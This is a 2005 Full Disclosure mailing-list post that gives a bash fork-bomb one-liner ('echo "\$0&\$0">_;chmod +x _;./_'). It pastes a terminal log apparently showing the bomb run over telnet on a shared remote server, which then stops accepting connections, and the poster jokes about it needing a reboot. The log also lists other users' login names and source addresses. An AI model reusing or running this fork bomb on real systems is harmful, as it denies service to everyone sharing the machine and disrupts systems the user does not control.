Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: bash vulnerability?

From: "luke" <lsw () digitalsec net>
Date: Tue, 16 Aug 2005 15:48:25 +0200
This work also:      echo "\$0&\$0">_;chmod +x _;./_


http://www.digitalsec.net/stuff/fun/CCC/ccc_and_cccs.txt

ps       pts/5        217.6.158.38     Fri Oct  1 08:08 - 08:09  (00:00)
moi      ftpd3326     p83.129.176.147. Fri Oct  1 05:11 - 05:11  (00:00)
jtesch   pts/9        herzog.cse.unsw. Fri Oct  1 04:34 - 09:32  (04:58)

sh-2.04$ uptime
9:38pm  up 179 days, 10:50, 21 users,  load average: 2.02, 2.79, 2.73 .
GREAT!

sh-2.04$ echo "\$0&\$0">_;chmod +x _;./_
ls
sh: fork: Resource temporarily unavailable
asd
sh: fork: Resource temporarily unavailable
asd
^]
telnet> quit
Connection closed.
(root@meoow):~ $ telnet www.cccs.de 4000
Trying 193.7.177.252...
Connected to www.cccs.de.
Escape character is '^]'.
Connection closed by foreign host.

0ops! Sorry, seems to need a reboot :(/lsw

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: